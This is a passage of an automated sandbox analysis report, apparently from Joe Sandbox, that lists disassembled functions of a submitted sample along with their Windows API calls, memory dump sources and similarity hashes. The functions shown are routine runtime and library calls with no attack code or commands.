                                                                                                    • GetLastError.KERNEL32(?,00E2ACDB,00E240EF,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue,00E37970,FlsSetValue,00000000,00000364,?,00E298B7), ref: 00E2AD72
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E2ACDB,00E240EF,00000000,00000000,00000000,?,00E2AED8,00000006,FlsSetValue,00E37970,FlsSetValue,00000000), ref: 00E2AD80
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: df347b2add02bc7f331d78dc802c422da9fa60ab0949ac4006b5f00c2fbe1c9f
                                                                                                    • Instruction ID: 3deb57d75613cfe8c223ef9f54e3f146011026130a3a313ce0f3051366c66af4
                                                                                                    • Opcode Fuzzy Hash: df347b2add02bc7f331d78dc802c422da9fa60ab0949ac4006b5f00c2fbe1c9f
                                                                                                    • Instruction Fuzzy Hash: 1501D43620123AAFC7314F79BC48E977F98AF457AB7191630F906F7560D720D8058AE1
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E297E5: GetLastError.KERNEL32(?,00E41098,00E24674,00E41098,?,?,00E240EF,?,?,00E41098), ref: 00E297E9
                                                                                                      • Part of subcall function 00E297E5: _free.LIBCMT ref: 00E2981C
                                                                                                      • Part of subcall function 00E297E5: SetLastError.KERNEL32(00000000,?,00E41098), ref: 00E2985D
                                                                                                      • Part of subcall function 00E297E5: _abort.LIBCMT ref: 00E29863
                                                                                                      • Part of subcall function 00E2BB4E: _abort.LIBCMT ref: 00E2BB80
                                                                                                      • Part of subcall function 00E2BB4E: _free.LIBCMT ref: 00E2BBB4
                                                                                                      • Part of subcall function 00E2B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E2BA44,?), ref: 00E2B7E6
                                                                                                    • _free.LIBCMT ref: 00E2BA9F
                                                                                                    • _free.LIBCMT ref: 00E2BAD5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                    • String ID: p
                                                                                                    • API String ID: 2991157371-2678736219
                                                                                                    • Opcode ID: 1fdba823028caba7a3c35c6185c24bef4ade103c66ca40b66a17e99a3666f49a
                                                                                                    • Instruction ID: 535c6cfac8ea7e88287c51ce57dd4fc963ba1283a0bdcbaad235eee0ca1f1046
                                                                                                    • Opcode Fuzzy Hash: 1fdba823028caba7a3c35c6185c24bef4ade103c66ca40b66a17e99a3666f49a
                                                                                                    • Instruction Fuzzy Hash: 3131F971904229AFDB10DFA9E945B9DBBF5FF40324F215099E404BB2A2EB325D44DB50
                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00010000,Function_00011160,?,00000000,00000000), ref: 00E11043
                                                                                                    • SetThreadPriority.KERNEL32(?,00000000), ref: 00E1108A
                                                                                                      • Part of subcall function 00E06C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E06C54
                                                                                                      • Part of subcall function 00E06DCB: _wcschr.LIBVCRUNTIME ref: 00E06E0A
                                                                                                      • Part of subcall function 00E06DCB: _wcschr.LIBVCRUNTIME ref: 00E06E19
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                                                                    • String ID: CreateThread failed
                                                                                                    • API String ID: 2706921342-3849766595
                                                                                                    • Opcode ID: f8d3f758dab7de0b954977011d9523893a0fe6b966f82e579d9db40c09ba1198
                                                                                                    • Instruction ID: 3d366d0c968d54b6f8fc336ca6f4dda46e7a719fffd7e0ef6b1b8d96b11bd034
                                                                                                    • Opcode Fuzzy Hash: f8d3f758dab7de0b954977011d9523893a0fe6b966f82e579d9db40c09ba1198
                                                                                                    • Instruction Fuzzy Hash: 9001DBB53443096FD734AE64AC96FB6B798EB44751F10106EF687761C0CAA168C58624
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: ($PDu<
                                                                                                    • API String ID: 1269201914-2719109745
                                                                                                    • Opcode ID: 49a62b1c3d7b6a2eab25cee00a97ed6a902ef012411f5ad2abb567204b399fbc
                                                                                                    • Instruction ID: 37f53b912e062228ba8e63f134be7f13e2ba06ee2a569e0095013d93f6c1f832
                                                                                                    • Opcode Fuzzy Hash: 49a62b1c3d7b6a2eab25cee00a97ed6a902ef012411f5ad2abb567204b399fbc
                                                                                                    • Instruction Fuzzy Hash: C0B012E12981407C314852182D07CBB094EC4C1F20330B02EFC04F0680E8804C860631
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E51F
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: 2$PDu<
                                                                                                    • API String ID: 1269201914-683690134
                                                                                                    • Opcode ID: 520217d994cfc0cf0500c704b8f44b3c6d9689db008bef1064b01ce1310022dc
                                                                                                    • Instruction ID: 2fba59fa9fe11bfbda55e5afd79302d6d18944aa11756d38ae28cc8af4234724
                                                                                                    • Opcode Fuzzy Hash: 520217d994cfc0cf0500c704b8f44b3c6d9689db008bef1064b01ce1310022dc
                                                                                                    • Instruction Fuzzy Hash: 80B012E129D1007D314852182C07DBB054EC4C1F20330702EFC04F0680E8804C850631
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E0D343,00000001,?,?,?,00000000,00E1551D,?,?,?), ref: 00E09F9E
                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00E1551D,?,?,?,?,?,00E14FC7,?), ref: 00E09FE5
                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E0D343,00000001,?,?), ref: 00E0A011
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$Handle
                                                                                                    • String ID:
                                                                                                    • API String ID: 4209713984-0
                                                                                                    • Opcode ID: ce482b15b1cb429e49d9c2a7ef20256dff59f36225a3702aa9a005339a795794
                                                                                                    • Instruction ID: ec1ec458ac572e64f050aef16783072de3dc5a2ce1a80cf9b3bd9bdee818ade1
                                                                                                    • Opcode Fuzzy Hash: ce482b15b1cb429e49d9c2a7ef20256dff59f36225a3702aa9a005339a795794
                                                                                                    • Instruction Fuzzy Hash: 3D31A27120830AAFDB14CF20D818BBE77A5EF94715F045529F981BB2D1C7759D88CBA2
                                                                                                    APIs
                                                                                                      • Part of subcall function 00E0C27E: _wcslen.LIBCMT ref: 00E0C284
                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A2D9
                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A30C
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E0A175,?,00000001,00000000,?,?), ref: 00E0A329
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2260680371-0
                                                                                                    • Opcode ID: 87c440dc2321500e01cb6e372f7fa2ec33cf490f0605e2fc418d00d649a8d1ac
                                                                                                    • Instruction ID: 78f9f0ec172a58eebe26235fa87734d1a79dd920d371cadd8e1970ab197182b8
                                                                                                    • Opcode Fuzzy Hash: 87c440dc2321500e01cb6e372f7fa2ec33cf490f0605e2fc418d00d649a8d1ac
                                                                                                    • Instruction Fuzzy Hash: 2F01B53560031C6AEF21AB758C0ABED36889F09784F0C5474F901F60D1D758DAC186B6
                                                                                                    APIs
                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E2B8B8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Info
                                                                                                    • String ID:
                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                    • Opcode ID: c19e30ecd1cfd70eaaeff5960bc9bbc2b125c6c16f969220ca609859580e1d8e
                                                                                                    • Instruction ID: b3556f9593a62bd1c48c3322b1886471920becaf08b0ac23b385d6d2ec95d523
                                                                                                    • Opcode Fuzzy Hash: c19e30ecd1cfd70eaaeff5960bc9bbc2b125c6c16f969220ca609859580e1d8e
                                                                                                    • Instruction Fuzzy Hash: 1E412A7090426C9EDF258E28DC84BF6BBF9EB45308F1414EDE59AA6142D3359A85CF60
                                                                                                    APIs
                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00E2AFDD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: String
                                                                                                    • String ID: LCMapStringEx
                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                    • Opcode ID: 44d12791518e94d04bafb58d8e05b31071eb5471d02383b1fa63f7430fc3bc82
                                                                                                    • Instruction ID: c51dab29f90214945fcba43622dfdf61eb620c66ba5e5935be455aea262d4656
                                                                                                    • Opcode Fuzzy Hash: 44d12791518e94d04bafb58d8e05b31071eb5471d02383b1fa63f7430fc3bc82
                                                                                                    • Instruction Fuzzy Hash: A501177260421EBBCF129F91ED06DEE7FA2EB48750F054254FE1475160C6368931EB81
                                                                                                    APIs
                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E2A56F), ref: 00E2AF55
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                    • Opcode ID: c611a26cbd24f54bdc14056935c3819ee9e651288ccb528b726b64253be9aefa
                                                                                                    • Instruction ID: 183e8777e42a5757f5af3d7d249a68ee9b6304caabc2cbce9cfa2922dea952a1
                                                                                                    • Opcode Fuzzy Hash: c611a26cbd24f54bdc14056935c3819ee9e651288ccb528b726b64253be9aefa
                                                                                                    • Instruction Fuzzy Hash: 2DF0B47164921CBFCB215F65DC0ADAEBFA1EF44711F014165FD0876260DA314A10E785
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Alloc
                                                                                                    • String ID: FlsAlloc
                                                                                                    • API String ID: 2773662609-671089009
                                                                                                    • Opcode ID: 51c018ffa48a816165b856ac8ee6aba35a4672739fc88731187f8461f196c93f
                                                                                                    • Instruction ID: c69a9eea4ae54c6c9c2cab317c3be4af381201dfaa470db0f708b39e0a5693af
                                                                                                    • Opcode Fuzzy Hash: 51c018ffa48a816165b856ac8ee6aba35a4672739fc88731187f8461f196c93f
                                                                                                    • Instruction Fuzzy Hash: ABE0E57164532C7BC721AB6AEC0AE6EBF94EB44721F0612A9FC05B7350CD715E4086D6
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 1b57adef94b7742becaeea969cb6e4c5c8675e7862fe412ddaa41b80af192ec0
                                                                                                    • Instruction ID: 4f7a06c21ee78c78edeed93754cf35c15fc222aee765de995bae4de79640a273
                                                                                                    • Opcode Fuzzy Hash: 1b57adef94b7742becaeea969cb6e4c5c8675e7862fe412ddaa41b80af192ec0
                                                                                                    • Instruction Fuzzy Hash: CDB012F539E200BC310851692C0BCF7014CE4C2B10330703EFC06F0281D840AC810631
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 87e904d241d0dc461bd02db94c0847c5afd88b77f1fe63c2739447d753360ef1
                                                                                                    • Instruction ID: 42b8e53bd812aa6e9d3c6931724739ab0074297b3ea976400ac1c05344efd680
                                                                                                    • Opcode Fuzzy Hash: 87e904d241d0dc461bd02db94c0847c5afd88b77f1fe63c2739447d753360ef1
                                                                                                    • Instruction Fuzzy Hash: 0DB012F139A100BC310856252C0BCF7014CD4C2B20330F13EFC06F0381D840EC850531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: dde305104fba81cbd20307aea2ef5467c041b1de310ba9255a1ab38b7efc2d0a
                                                                                                    • Instruction ID: f2dc236f5bd2efc6b1338cb1b4a89ad90a03d494f2d32157fbd1ae82b99bbf62
                                                                                                    • Opcode Fuzzy Hash: dde305104fba81cbd20307aea2ef5467c041b1de310ba9255a1ab38b7efc2d0a
                                                                                                    • Instruction Fuzzy Hash: 28B012F539A200BC310811652C0BCF7010CD4C3B10330B43EFC02F0581D840EC810431
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1EAF9
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID: 3Ro
                                                                                                    • API String ID: 1269201914-1492261280
                                                                                                    • Opcode ID: 3f32f5c5598230a6cd7c812e0220b0bfc3b86893c1481c236dfacf508a8fe199
                                                                                                    • Instruction ID: b33a577b0ba359fef881318291db26ddc7aa38b6054e8f122af9969afaa12374
                                                                                                    • Opcode Fuzzy Hash: 3f32f5c5598230a6cd7c812e0220b0bfc3b86893c1481c236dfacf508a8fe199
                                                                                                    • Instruction Fuzzy Hash: 75B092E629A1427C310862102907CBA4148C8D1F90330B12AB800B4181988158860431
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: b5882c229a56c5fed77c00a2851532509c2e163d0c4807076061baf9fa48798e
                                                                                                    • Instruction ID: babf44dea440c241202a0b640cdb756e9f8eb0ccef0b361f186d5ce58b25838f
                                                                                                    • Opcode Fuzzy Hash: b5882c229a56c5fed77c00a2851532509c2e163d0c4807076061baf9fa48798e
                                                                                                    • Instruction Fuzzy Hash: 17B012F139A100BC310851252C0FCF7014CE4C1B10330743EFC06F02C1D840AC810531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 0aee2933a845e7383ec1649fe26b3ed2c4b397fdd2edd96be0e4ba1a0fd720d7
                                                                                                    • Instruction ID: b58b8d8b998c0e657094dfe6ac98dd6813cc4a80b20c5114888fd478ae1d0629
                                                                                                    • Opcode Fuzzy Hash: 0aee2933a845e7383ec1649fe26b3ed2c4b397fdd2edd96be0e4ba1a0fd720d7
                                                                                                    • Instruction Fuzzy Hash: 97B012F139A100BC310851252D0BCF701CCD4C1B10730703EFC06F0280DC40ADC20531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: aca74c79e3ce7f7748e789aed70e2dbe941a86ef10f5fe612ce51d4ea1537631
                                                                                                    • Instruction ID: b8728bdc934c8c329472156d62e40e023147af90f704546a48453aece0d2e9d3
                                                                                                    • Opcode Fuzzy Hash: aca74c79e3ce7f7748e789aed70e2dbe941a86ef10f5fe612ce51d4ea1537631
                                                                                                    • Instruction Fuzzy Hash: 89B012F13AB140BC310851252C0BCF7118DE9C1B10730703EFC07F0280D840AC810531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 458d61a686628ca78bd78b0dcd67969c85a4b3e259340a17b0eb74310819e2c3
                                                                                                    • Instruction ID: eb509df9d55fa5701b5288cd41ccc8fa5a35cd3de2475c667dd5a62f485052e9
                                                                                                    • Opcode Fuzzy Hash: 458d61a686628ca78bd78b0dcd67969c85a4b3e259340a17b0eb74310819e2c3
                                                                                                    • Instruction Fuzzy Hash: 37B012F139A100BC310851352C0BCF7018CD4C2B10330B03EFC06F0280D840ECC10531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 7d2be60384cdb137929e92f92fed5effe63430ad5b1bc18a7c925198b12068ad
                                                                                                    • Instruction ID: 9a9e9411c88fa3ea7de5a64887177116cf10f8ea8143d3f2002901d6700da652
                                                                                                    • Opcode Fuzzy Hash: 7d2be60384cdb137929e92f92fed5effe63430ad5b1bc18a7c925198b12068ad
                                                                                                    • Instruction Fuzzy Hash: BEB012F139B140BC310851252C0BCF7114DD5C2B10730B03EFC06F0280D840EC810531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 0e71e658cf4f5545970a86bbdf5f7382a9c8f5f08cd1f95045c71aa062bf51d2
                                                                                                    • Instruction ID: fe2729520db740f204bc47b8aa18655630ccb5c199cf1a51c30eac915372df7a
                                                                                                    • Opcode Fuzzy Hash: 0e71e658cf4f5545970a86bbdf5f7382a9c8f5f08cd1f95045c71aa062bf51d2
                                                                                                    • Instruction Fuzzy Hash: F3B012F139B240BD314852252C0BCF7114DD5C1B10730713EFC06F0280D840ACC50531
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
